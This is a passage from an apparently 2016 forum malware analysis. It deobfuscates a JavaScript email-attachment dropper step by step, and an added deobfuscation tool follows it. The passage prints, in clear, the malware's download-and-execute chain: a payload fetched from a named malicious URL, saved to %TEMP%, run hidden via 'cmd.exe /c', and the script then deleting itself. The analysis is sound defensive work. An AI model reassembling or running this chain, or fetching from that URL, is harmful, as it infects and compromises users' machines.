2-3) The payload path/name:

In the previous sample, there was an error:

welerle0 = ymnevi2[ezlajvelevny5 + ysuzsibi2 + uhvaj9 + tutobmytvo0 + hivelg1](epygejm8 + pkekzigl8);
=> Stream.SaveToFile(%TEMP% + rad44325.tmp)
=> they had forgotten the "\\" part between %TEMP% and rad44325.tmp
=> It should have been: C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad44325.tmp :rolleyes:

=> It is: C:\Users\DardiM\AppData\Local\Temprad44325.tmp :D

In these new samples, they have corrected it:

var czeqip = jrasujw[rtyrcomozsa8 + quludvi1 + jzucpekkage + lagyvgeq4 + hhitwycyxd0 + uvmewasca](2) + zgafgado + jrasujw[zcexsaqekg + tfufubres0 + gibdymco0 + ruxrabu]();

Using the search tool from notepad++ to find what the "strange names" of the vars mean:

var czeqip = FileObjectSystem["Get" + "Spe" + "cia" + "lFo" + "lde" + "r"](2) + "\\\\"
+ FileObjectSystem["Get" + "Tem" + "pNa" + "me"]

=> var czeqip = FileObjectSystem["GetSpecialFolder"](2) + "\\\\"
+ FileObjectSystem["GetTempName"]

GetSpecialFolder(2):
=> %TEMP%
=> Example: C:\Users\DardiM\AppData\Local\Temp\
GetTempName:
=> gets a random .tmp file name
=> Example: rad44325.tmp

=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp

(with the error : C:\Users\DardiM\AppData\Local\Temprad44325.tmp)


This time, the right folder and a random payload name are used; they have not forgotten "\\\\":

%TEMP% + "\\\\" + Randomname.tmp

Why four "\"?!
The backslash is used as a marker character to tell the compiler/interpreter that the next character has some special meaning.
\ is used as an indication, so the first \ tells the interpreter that the second \ is a plain char
"\\" => means: use "\"
then "\\\\" => means: use "\\"
at the concatenation "\\\\" => "\\"
And when the whole string is used:
C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad44325.tmp
=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
2-4) The case part:

case true:
var hvaqxena = new Function(ileslyxy5)();
var ulosucith = [5, 1, 3, 1, 8, [4, 9, 3, 1, 3, 5, "o", 7, 1], 6, 9]["5"];
var mkolheni2 = [3, 9, [9, 3, 6, "n", 6, 7, 9, 3, 2], 6, 8, 4, 9, 8]["2"];
var emnylpupp4 = [[8, 9, "jnu", 1, 3, 3, 5, 1, 7], 7, 6, 8, 2, 8, 7, 2]["0"];
var geqjyxytp7 = [2, 1, 7, 4, 2, [4, "id", 4, 5, 1, 8, 1, 1], 2, 7, 7]["5"];
var abuqxyhe5 = [7, 7, 7, 1, 1, 9, 1, [7, 5, 3, 6, 2, 6, 6, "jj"]]["7"];
var evgoxhogqo7 = [3, 7, 8, 4, 1, 1, 5, 6, 5, [1, 3, 3, 2, 6, 4, 9, 5, "ep", 9]]["9"];
var jegewyxde = [7, 7, 9, 1, [7, 6, 3, 6, 8, "i", 9, 2, 7], 4, 7, 6, 7]["4"];
var himbatad = [8, 1, 4, 4, 5, 6, 2, 6, 5, [7, "o", 2, 8, 2, 5, 2, 3, 6]]["9"];
var omulpybl5 = [[2, 2, 3, 5, 5, 8, "u", 1, 9], 1, 6, 1, 8, 2, 8, 9]["0"];
var sqyvalapy0 = [[5, 8, 7, 6, 9, 4, 7, 4, 1, "i"], 4, 8, 9, 9, 6, 7, 6, 6, 1]["0"];
var ohucrilc3 = [3, 6, 4, [6, 5, 4, 6, 8, 3, 6, "z", 1, 7], 1, 4, 9, 6, 8]["3"];
var ytelrurm8 = [9, 4, 4, 7, 3, 1, 8, [6, 1, 5, 7, 4, 2, 3, 5, "am", 8]]["7"];
var eziwyqfox3 = [3, 4, 6, 1, 2, 7, 7, 5, [7, 8, 1, 6, 3, 8, 8, "xa", 9, 4], 6]["8"];
var tapkemifwo7 = [8, 6, 6, [5, 2, "yh", 8, 7, 1, 7, 3], 2, 1, 8, 1]["3"];
var rhawuxpullu = [5, 6, 3, 5, 2, 3, 7, 8, 4, [4, 9, 5, 9, 3, 7, "bno", 2, 8, 2]]["9"];
break;
}


Only one part is useful:

var hvaqxena = new Function(ileslyxy5)();

The other parts are the famous useless array stuff (see previous part 2-1)), only put there to obfuscate the script a bit more
(remember we have seen var hvaqxena: "return ActiveXObject;");

3) Main part - deobfuscated:

var owdeqg2 = yvyndax;

=> "ADODB.Stream"
var ekwidedul = new hvaqxena(owdeqg2);

=> var ekwidedul = new ActiveXObject("ADODB.Stream");
=> create the Stream object that will be used to save the data received by the request

ekwidedul[urtiwguqja + hgudipcu]();

=> Stream["Open"]
=> Opens the Stream, to be able to use it

var qupqykmy = ijigsokhimw3;

=> URL used: "http ://www .contrivedzh.top/admin.php?f=2.dat"
ekwidedul[lgimonra3 + lgufjaregzi + otvebolhyn] = 0;

=> Stream["Position"] = 0
=> prepares the position where to write the data

var gmavabava8 = derfycgy;

=> "WScript.Shell"
=> will be used to create an ActiveX object Shell

var ecystogo = imis9[fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu];

=> var ecystogo = WScript["ScriptFullName"]
=> The script full name
=> Example: "J:\\ANALISE\\21_11_2016\\EMAIL_25793.js"

var exet3 = new hvaqxena(gmavabava8);

=> var exet3 = new ActiveXObject("WScript.Shell")
=> Shell object, will be used to run the payload (see above parts)

var qrujcydvipd9 = axduxynat;

=> "MSXML2.XMLHTTP"
=> the string that will be used to create the HTTP object

var gvidummulj7 = epcemescip;

=> "Scripting.FileSystemObject"

=> var gvidummulj7 = epcemescip;

=> var epcemescip = [9, 3, 7, 9, texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4, 7, 8, 5, 2]["4"];

=> texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4

=> "Scripting.FileSystemObject"
var jrasujw = new hvaqxena(gvidummulj7);

=> new ActiveXObject("Scripting.FileSystemObject")
=> the object used to manipulate files/folders

var abogikn = new hvaqxena(qrujcydvipd9);

=> new ActiveXObject("MSXML2.XMLHTTP")
=> creates the http object, to make the request

var czeqip = jrasujw[rtyrcomozsa8 + quludvi1 + jzucpekkage + lagyvgeq4 + hhitwycyxd0 + uvmewasca](2) + zgafgado + jrasujw[zcexsaqekg + tfufubres0 + gibdymco0 + ruxrabu]();

=> Path:
=> Example: C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp


var czeqip = FileObjectSystem["Get" + "Spe" + "cia" + "lFo" + "lde" + "r"](2) + "\\\\"
+ FileObjectSystem["Get" + "Tem" + "pNa" + "me"]

=> var czeqip = FileObjectSystem["GetSpecialFolder"](2) + "\\\\"
+ FileObjectSystem["GetTempName"]

GetSpecialFolder(2):

=> %TEMP%

=> Example: C:\Users\DardiM\AppData\Local\Temp\

GetTempName:

=> Example: rad44325.tmp

=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
abogikn[odojkycxyzd](yzozyvy, qupqykmy, 0);

=> var odojkycxyzd = [4, 1, 4, 4, 7, 2, 8, 'open', 4, 1]["7"];
=> "open"
=> Stream["open"]("GET", URL, 0)
=> Opens a connection to the URL

abogikn[pdimuly]();

=> var pdimuly = [6, 1, "send", 5, 4, 7, 8, 4]["2"];
=> "send"
=> http["send"]()
=> http.send()
=> Makes the http request

ekwidedul[osabaq + zudxoba8] = 1;

=> Stream.Type = 1
=> The data received will be considered as binary data (not text) when put on the Stream

if (abogikn[qusuhyxi + ynabovx4] == 200) {

=> http.Status == 200 ?
=> tests whether the request was successfully made


ekwidedul[snumsisike + hnegfepsuta3](abogikn[yksazbasfo8 + odomebef + zevibnib + jenhadno1]);

=> Stream["Write"](http["ResponseBody"])
=> Stream.Write(http.ResponseBody)
=> Writes the data received by the request to the Stream object.

ekwidedul[fjynhevonra1 + kzunaxve5 + obutdymi + jyryxxirnu](czeqip);

=> Stream["SaveToFile"](path)
=> Stream.SaveToFile(path)
=> saves the data to a file, using the path
=> Example:

=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
ekwidedul[awgykpomoj1 + hdocirzy1]();

=> Stream["close"]()
=> Stream.close()
=> closes the Stream object

var yhamgyv1 = odynfinteds + czeqip;

=> "cmd.exe /c " + path
=> Example: "cmd.exe /c C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp"
exet3[vwafgehni0](yhamgyv1, 0);

=> Shell["run"](commandLine, 0)
}
jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);


=> I have explained in part 2-3) how to deobfuscate this part
=> FileObjectSystem["deleteFile"](WScript.ScriptFullName)
=> deletes the currently running script

4) Conclusion:


Some parts have been improved in these new versions.

3 types of arrays are used, with one of them completely useless for the malware part (data not used as "puzzle parts", but to obfuscate the script a bit more).
Now, the useful value is not the last value, but needs the index clue to be found.

The error with folder / name to be used has been solved.

The script deletes itself at the end.

URL:

http ://www .contrivedzh.top/admin.php?f=2.dat
Payload:

Example: C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp

Random name:

=> rad: means "random"
=> + 5 HEX values (0 => 9 and A => F)
3 / 56
Antivirus scan for 413830976864196c4ed5312af9888cf15a541ec0626e6101e2e2bb75276d187a at 2016-11-21 15:56:32 UTC - VirusTotal
https://www.hybrid-analysis.com/sam...ec0626e6101e2e2bb75276d187a?environmentId=100
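As an added example (not code from this thread or its author), here is a small resolver for the three array kinds described in part 2-1: it selects the element named by the index clue, records nested-array decoys, follows `a + b + c` concatenations, and rewrites the `obj[a + b + c]` lookups of the main part as plain strings. It assumes one definition per line, only simple string escapes, and pieces joined only with `+`; the sample input is constructed from definitions quoted in the post.

```javascript
// Added example, not the thread's code: resolves the "index clue" arrays of
// part 2-1. Assumes one `var NAME = [...]["N"];` per line, simple escapes only.
// Constructed sample: definitions copied from the post (all three array kinds,
// including the "\\\\" piece) plus the last line of the main part.
const SAMPLE = String.raw`
var uwabbyranl = [3, 2, 8, 6, 9, "cmd.", 5, 6, 1, 5]["5"];
var umqesas0 = [1, 4, 9, "exe ", 5, 2, 5, 8, 4]["3"];
var ukekkiva = [8, "/c ", 7, 6, 6, 7, 9, 9, 8]["1"];
var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];
var anhujyv1 = [3, 5, 9, 8, "\\\\", 9, 4, 7]["4"];
var zgafgado = [6, 8, 6, 7, 7, 8, 7, anhujyv1, 2]["7"];
var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];
var ifcedyka9 = [4, 6, 2, 7, 7, 2, "del", 3, 3]["6"];
var exolcyky = [2, 1, "ete", 4, 1, 7, 1, 5, 3]["2"];
var igoptujmyk = [3, 2, 1, 5, 2, 5, 6, 'Fil', 8]["7"];
var bigpefco = [1, 7, 8, 4, "e", 2, 6, 7, 3, 7]["4"];
jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);
`;
// `var NAME = [ elements ]["INDEX"];`
const DEF_RE = /^\s*var\s+([A-Za-z_$][\w$]*)\s*=\s*\[(.*)\]\s*\[\s*["'](\d+)["']\s*\]\s*;\s*$/;
// `obj[a + b + c]` lookups in the main part
const KEY_RE = /\[([A-Za-z_$][\w$]*(?:\s*\+\s*[A-Za-z_$][\w$]*)*)\]/g;
// Split an array literal's body on top-level commas only, so a nested decoy
// array stays one element and commas inside quotes are left alone.
function splitTopLevel(body) {
  const parts = [];
  let depth = 0, quote = null, cur = "";
  for (let i = 0; i < body.length; i++) {
    const ch = body[i];
    if (quote) {
      cur += ch;
      if (ch === "\\") cur += body[++i];       // keep the escape pair together
      else if (ch === quote) quote = null;
    } else if (ch === "," && depth === 0) { parts.push(cur.trim()); cur = ""; }
    else {
      if (ch === '"' || ch === "'") quote = ch;
      else if (ch === "[") depth++;
      else if (ch === "]") depth--;
      cur += ch;
    }
  }
  if (cur.trim()) parts.push(cur.trim());
  return parts;
}
// Decode a quoted literal; the source's "\\\\" becomes two backslashes.
function unquote(lit) {
  return lit.slice(1, -1).replace(/\\(.)/g, (_, c) => ({ n: "\n", t: "\t", r: "\r" })[c] ?? c);
}

// Resolve one name: kind (1) a quoted piece, kind (2) a nested array = decoy
// (recorded, no value), kind (3) an `a + b + c` concatenation of other names.
function resolve(defs, name, decoys, cache, stack = new Set()) {
  if (cache.has(name)) return cache.get(name);
  const elem = defs.get(name);
  if (elem == null || stack.has(name)) return null;  // unknown name or cycle
  stack.add(name);
  let out = null;
  if (elem[0] === "[") decoys.add(name);
  else if (elem[0] === '"' || elem[0] === "'") out = unquote(elem);
  else if (!/^\d+$/.test(elem)) {
    out = "";
    for (const part of elem.split("+").map(s => s.trim())) {
      const v = (part[0] === '"' || part[0] === "'")
        ? unquote(part) : resolve(defs, part, decoys, cache, stack);
      if (v === null) { out = null; break; }
      out += v;
    }
  }
  stack.delete(name);
  cache.set(name, out);
  return out;
}

// Build the name table from every definition line, then rewrite the lookups
// in the remaining lines as plain strings. Returns { table, decoys, code }.
function deobfuscate(src) {
  const defs = new Map();
  for (const line of src.split("\n")) {
    const m = DEF_RE.exec(line);
    if (m) defs.set(m[1], splitTopLevel(m[2])[Number(m[3])] ?? null);
  }
  const decoys = new Set(), cache = new Map(), table = new Map();
  for (const name of defs.keys()) {
    const v = resolve(defs, name, decoys, cache);
    if (v !== null) table.set(name, v);
  }
  const code = src.split("\n").filter(l => l.trim() && !DEF_RE.test(l))
    .map(l => l.replace(KEY_RE, (whole, expr) => {
      const parts = expr.split("+").map(s => s.trim());
      return parts.every(p => table.has(p))
        ? "[" + JSON.stringify(parts.map(p => table.get(p)).join("")) + "]" : whole;
    }));
  return { table, decoys, code };
}
```

Run `deobfuscate(SAMPLE)`: `table` gives `odynfinteds` = "cmd.exe /c ", `decoys` lists `ebqypsuzyn`, and `code` holds the last line rewritten as `jrasujw["deleteFile"](ecystogo);`.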
 
